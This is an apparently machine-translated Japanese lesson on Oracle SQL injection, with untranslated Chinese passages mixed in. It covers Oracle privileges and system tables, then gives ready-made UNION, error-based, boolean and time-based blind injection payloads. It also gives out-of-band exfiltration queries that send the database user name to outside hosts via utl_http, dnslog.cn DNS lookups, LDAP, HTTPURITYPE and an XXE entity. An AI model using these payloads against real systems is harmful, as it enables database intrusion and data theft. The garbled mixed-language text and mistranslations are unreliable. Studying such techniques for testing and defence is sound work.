ネットワーク セキュリティの高度な学習レッスン 15 - Oracle SQL インジェクション

---

1. Oracle データベースの概要

Oracle データベース システムは、世界中で人気のあるリレーショナル データベース管理システムであり、移植性が高く、使いやすく、強力な機能を備えており、大中小規模のさまざまなコンピュータ環境に適しています。これは、効率的で信頼性が高く、高スループットに適応できるデータベース ソリューションです。

Oracle サービスのデフォルト ポート: 1521

Oracle と MySQL データベースの構文はほぼ同じですが、構造は同じではありません。最大的一个特点就是oracle可以调用Java代码。

Oracle では、select ... from の後にクエリ テーブル名を続ける必要があります。

---

2. Oracle と MySQL の構文の違い:

1. Oracle では、クエリするテーブル名を select の後に指定する必要があり、dual を使用できます。

2. Oracle は || を使用して文字列を連結し、MySQL は OR 演算を使用します。
   

3. Oracle では一重引用符と二重引用符はどちらも文字列ですが、二重引用符を使用すると、sysdate などのキーワードを削除できます。

4. Oracle では、仮想テーブルの rownum フィールドを使用して where 条件によって制限を判断する必要があります。
   

5. Oracle には null 文字はありません。'' と 'null' は両方とも null ですが、MySQL では '' は依然として文字列であると見なされます。

6. Oracle には、ユニオン選択などのデータ形式に関する厳しい要件があります。

---

3. Oracle データベースの構造

「データベース」の概念について、Oracle では「表領域」の定義を採用しています。データ ファイルは複数のテーブル スペースで構成され、これらのデータ ファイルと関連ファイルが完全なデータベースを形成します。

データベースが作成されると、Oracle はデフォルトで SYSTEM、SYSAUX、USERS、UNDOTBS、および TEMP の 5 つのライブラリを作成します。

1. SYSTEM: これは、システム テーブルや管理構成などの基本情報を保存するために使用されます。
2. SYSAUX: SYSTEM と同様に、SYSTEM のスペース負担を軽減するために、主に追加のシステム情報を保存します。
3. UNDOTBS: トランザクションのロールバックなどに使用されます。
4. TEMP: メモリの負担を軽減するためのキャッシュ スペースとして使用されます。
5. ユーザー: 定義したテーブルとデータを保存します。

Oracle の各データベースには 1 つずつありdual表，这个表是虚表、実際のストレージの意味はありません。1 つのデータのみを格納します。Oracle の SQL 構文では、select の後に from が続く必要があるため、通常は計算とクエリ時間として Dual を使用します。 SQL ステートメントの「from」の後の仮想テーブルがスペースを占有するまで待ちます。例: デュアルから 1+1 を選択します。

Oracle では、クエリするテーブル名を select の後に指定する必要があり、dual を使用できます。

---

4. Oracle の主要なシステム テーブル

• – dba_tables: システム内のすべてのテーブルに関する情報を照会するには DBA 権限が必要です
• – all_tables: 現在のユーザーが権限を持つテーブルに関する情報
• – user_tables: 現在のユーザー名のテーブルに関する情報
• – DBA_ALL_TABLES: DBA ユーザーが所有またはアクセスするオブジェクトとテーブル
• – ALL_ALL_TABLES: 特定のユーザーが所有またはアクセスするオブジェクトとテーブル
• – USER_ALL_TABLES: 特定のユーザーが所有するオブジェクトとテーブル

---

5. Oracle 権限の分類

Oracle では、Oracle 権限は、さまざまなシステム管理方法に基づいて、システム権限とエンティティ権限の 2 つのカテゴリに分類されます。システム権限とは、許可されたユーザーがデータベースに接続できるかどうか、およびデータベース内でどのようなシステム操作を実行できるかを示します。エンティティ権限は、特定のスキーマ エンティティ (スキーマ) に対してユーザーが持つ権限を指します。

• システム権限: システムは、データベースを使用するためのユーザーの権限を規定します。(システム権限はユーザー向けです)。

• エンティティ権限: 他のユーザーのテーブルまたはビューに対するユーザーのアクセス権限。(テーブルまたはビューの場合)。

1. システム権限

• DBA: すべての権限を持ち、システム内で最高の権限を持ちます。DBA のみがデータベース構造を作成できます。
• リソース: リソース権限を持つユーザーはエンティティのみを作成でき、データベース構造は作成できません。
• CONNECT: 接続権限を持つユーザーは Oracle にログインすることしかできず、エンティティやデータベース構造を作成することはできません。

一般ユーザーの場合: 接続、リソース権限を付与します。

DBA 管理ユーザーの場合: 接続、リソース、dba 権限を付与します。

系统权限授权命令： 
系统权限只能由DBA用户授出：sys, system(最开始只能是这两个用户) 

授权命令：
SQL> grant connect, resource, dba to 用户名1 [,用户名2]…; 
注:普通用户通过授权可以具有与system相同的用户权限，但永远不能达到与sys用户相同的权限，system用户的权限也可以被回收。 

例： 
SQL> connect system/manager SQL> Create user user50 identified by user50; SQL> grant connect, resource to user50;

查询用户拥有哪里权限： 
SQL> select from dba_role_privs; SQL> select from dba_sys_privs; SQL> select * from role_sys_privs;

查自己拥有哪些系统权限：
SQL> select * from session_privs;

删除用户：
SQL> drop user 用户名 cascade; //加上cascade则将用户连同其创建的东西全部删除

系统权限传递：增加WITH ADMIN OPTION选项，则得到的权限可以传递。 
SQL> grant connect, resorce to user50 with admin option; //可以传递所获权限。

系统权限回收：系统权限只能由DBA用户回收
SQL> Revoke connect, resource from user50;

说明： 
1）如果使用WITH ADMIN OPTION为某个用户授予系统权限，那么对于被这个用户授予相同权限的所有用户来说，取消该用户的系统权限并不会级联取消这些用户的相同权限。 
2）系统权限无级联，即A授予B权限，B授予C权限，如果A收回B的权限，C的权限不受影响；系统权限可以跨用户回收，即A可以直接收回C用户的权限。

2. 主体の権限

• 選択、更新、挿入、変更、インデックス付け、削除、すべて
  #all にはすべての権限が含まれます
• 実行
  #ストアド プロシージャの実行権限

user01: 
SQL> grant select, update, insert on product to user02; 
SQL> grant all on product to user02;

user02: 
SQL> select * from user01.product; 
// 此时user02查user_tables，不包括user01.product这个表，但如果查all_tables则可以查到，因为他可以访问。

将表的操作权限授予全体用户：
SQL> grant all on product to public; 
// public表示是所有的用户，这里的all权限不包括drop。

实体权限数据字典：
SQL> select owner, table_name from all_tables; // 用户可以查询的表 
SQL> select table_name from user_tables; // 用户创建的表 
SQL> select grantor, table_schema, table_name, privilege from all_tab_privs; // 获权可以存取的表（被授权的） 
SQL> select grantee, owner, table_name, privilege from user_tab_privs; // 授出权限的表(授出的权限)

DBA用户可以操作全体用户的任意基表(无需授权，包括删除)：

DBA用户： 
SQL> Create table stud02.product( id number(10), name varchar2(20)); 
SQL> drop table stud02.emp;

SQL> create table stud02.employee as select * from scott.emp;

实体权限传递(with grant option)：
user01: SQL> grant select, update on product to user02 with grant option; 
// user02得到权限，并可以传递。

实体权限回收：
user01: 
SQL>Revoke select, update on product from user02; 
//传递的权限将全部丢失。

说明:
如果取消某个用户的对象权限，那么对于这个用户使用WITH GRANT OPTION授予权限的用户来说，同样还会取消这些用户的相同权限，也就是说取消授权时级联的。

3. 管理者の役割

建一个角色：
sql>create role role1;

授权给角色：
sql>grant create any table,create procedure to role1;

授予角色给用户：
sql>grant role1 to user1;

查看角色所包含的权限：
sql>select * from role_sys_privs;

创建带有口令以角色(在生效带有口令的角色时必须提供口令)：
sql>create role role1 identified by password1;

修改角色：是否需要口令
sql>alter role role1 not identified; 
sql>alter role role1 identified by password1;

设置当前用户要生效的角色 (注：角色的生效是一个什么概念呢？假设用户a有b1,b2,b3三个角色，
那么如果b1未生效，则b1所包含的权限对于a来讲是不拥有的，
只有角色生效了，角色内的权限才作用于用户，
最大可生效角色数由参数MAX_ENABLED_ROLES设定；
在用户登录后，oracle将所有直接赋给用户的权限和用户默认角色中的权限赋给用户。） 

sql>set role role1; //使role1生效 
sql>set role role,role2; //使role1,role2生效 
sql>set role role1 identified by password1; //使用带有口令的role1生效 
sql>set role all; //使用该用户的所有角色生效 
sql>set role none; //设置所有角色失效 
sql>set role all except role1; //除role1外的该用户的所有其它角色生效。 
sql>select * from SESSION_ROLES; //查看当前用户的生效的角色。

修改指定用户，设置其默认角色
sql>alter user user1 default role role1;
sql>alter user user1 default role all except role1;

删除角色 
sql>drop role role1;

角色删除后，原来拥用该角色的用户就不再拥有该角色了，相应的权限也就没有了。

说明: 
1)无法使用WITH GRANT OPTION为角色授予对象权限 
2)可以使用WITH ADMIN OPTION 为角色授予系统权限,取消时不是级联

---

6. Oracle共通情報の問合せ方法

1. データベースのバージョン情報を取得する

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%25';

2. オペレーティング システムのバージョン情報を取得する

SELECT banner FROM v$version WHERE banner LIKE 'TNS%25';

3. 現在のデータベースを取得する

SELECT name FROM v$database;

4. データベースユーザーの取得

SELECT user FROM dual;

5. すべてのデータベース ユーザーを取得する

SELECT username FROM all_users;
SELECT name FROM sys.user$; -- 需要高权限

6. 現在のユーザー権限を取得します

SELECT * FROM session_privs;

7. 現在のユーザーがアクセス許可を持つすべてのデータベースを取得します

SELECT DISTINCT owner, table_name FROM all_tables;

8. テーブルを取得します。all_tables は MySQL の information_schema.tables に似ています。

SELECT * FROM all_tables;

9. フィールド名を取得する

SELECT column_name FROM all_tab_columns;

10. Oracle が起動すると、一部のシステム コンテキスト情報が userenv に保存され、SYS_CONTEXT 関数を通じて、対応するパラメータ値を取得できます。現在のユーザー名などが含まれます。

SELECT SYS_CONTEXT（'USERENV'，'SESSION_USER'） from dual;

---

7. ジョイントクエリインジェクション

1. フィールドの数を推測して順序付けする

ユニオン選択クエリの場合、各フィールドは前の選択のデータ型 (文字列/数値) に対応する必要があることに注意してください。したがって、通常は最初に null 文字プレースホルダーを使用し、次に各フィールドの型をビットごとに決定します。次に例を示します。

?username=admin' union select null,null,null from dual --+ 正常
?username=admin' union select 1,null,null from dual --+ 正常说明第一个字段是数字型
?username=admin' union select 1,2,null from dual --+ 第二个字段为数字时错误
?username=admin' union select 1,'asd',null from dual --+ 正常，就为字符串 依此类推

2. データベースのバージョンとユーザー名を確認する

?username=admin' union select 1,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual --+

3. 現在のデータベースを確認する

?username=admin' union select 1,(SELECT global_name FROM global_name),null from dual --+

4. 表を調べる

wmsys.wm_concat()等同于MySQL中的group_concat()，在11gr2和12C上已经抛弃，可以用LISTAGG()替代

ただし、LISTAGG() は varchar 型を返すため、データテーブルの数が多い場合、文字列長が長くなりすぎます。このとき、文字列インターセプトを使用できます。

?username=admin' union select 1,(select LISTAGG(table_name,',')within group(order by owner)name from all_tables where owner='SYSTEM'),null from dual --+

5. フィールドをチェックする

?username=admin' union select 1,(select column_name from all_tab_columns where table_name='TEST' and rownum=2),null from dual --

---

8. エラー挿入

エラー挿入によく使用される関数:
1. utl_inaddr.get_host_name

select utl_inaddr.get_host_name((select user from dual)) from dual;

11g以降、この機能を使用するデータベースユーザーにはネットワークへのアクセス権限が必要です

2、ctxsys.drithsx.sn

select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

パラメータが正しくない場合、テキストを処理する関数はエラーを報告します。

3、CTXSYS.CTX_REPORT.TOKEN_TYPE

select CTXSYS.CTX_REPORT.TOKEN_TYPE((select user from dual), '123') from dual;

4、XMLタイプ

?username=admin' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --+

URL エンコードに注意してください。返されたデータにスペースが含まれている場合、自動的に切り詰められて不完全なデータになります。この場合は、まず 16 進数に変換してからエクスポートしてください。

5、dbms_xdb_version.チェックイン

select dbms_xdb_version.checkin((select user from dual)) from dual;

6、dbms_xdb_version.makeversioned

select dbms_xdb_version.makeversioned((select user from dual)) from dual;

7、dbms_xdb_version.チェックアウト解除

select dbms_xdb_version.uncheckout((select user from dual)) from dual;

8、dbms_utility.sqlid_to_sqlhash

SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

9、ordsys.ord_dicom.getmappingxpath

select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

10、UTL_INADDR.get_host_name

select UTL_INADDR.get_host_name((select user from dual)) from dual;

11、UTL_INADDR.get_host_address

select UTL_INADDR.get_host_name('~'||(select user from dual)||'~') from dual;

---

9. ブラインドベット

1. ブールブラインド注入

次のような単純な文字列比較を使用します。

?username=admin' and (select substr(user, 1, 1) from dual)='S' --

デコードして 0 で除算することにより、ブール ブラインド インジェクションを実行します。次に例を示します。

?username=admin' and 1=(select decode(substr(user, 1, 1), 'S', (1/1),0) from dual) --+

2. タイムブラインド注入

時間遅延関数: DBMS_PIPE.RECEIVE_MESSAGE() function
dbms_pipe.receive_message('RDS', 10) #RDS パイプラインから返されるデータを 10 秒間待ちます。

select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('asd', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

デコードと一緒に使用することもできます。

select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual;

---

10. 帯域外 OOB

MySQL のload_file に似たアウトオブバンド ブラインド インジェクション。OOB にはネットワーク要求を開始するための許可が必要であり、制限があります。

1. 外部ネットワークHTTPにアクセスする必要があります

使用機能:utl_http.request()

select utl_http.request('http://localhost:8080/index?username=' || (select user from dual)) from dual;

2. アウトオブバンドの DNS 解決

使用機能:utl_inaddr.get_host_address

select utl_inaddr.get_host_address((select user from dual)||'.cbb1ya.dnslog.cn') from dual;

3、SYS.DBMS_LDAP.INIT

SELECT DBMS_LDAP.INIT((select user from dual)||'.24wypw.dnslog.cn',80) FROM DUAL;

この機能は10g/11gではパブリック権限を持っています

4、HTTPURIタイプ

SELECT HTTPURITYPE((select user from dual)||'.24wypw.dnslog.cn').GETCLOB() FROM DUAL;

5、Oracle XXE (CVE-2014-6577)

xxe と言われていますが、実際には xml を使用して外部ドキュメントをロードし、データをアウトオブバンドで実行すると考えるべきです。httpとftpをサポート

1. http

select 1 from dual where 1=(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.124.1/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual); 

2. ftp

select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;

---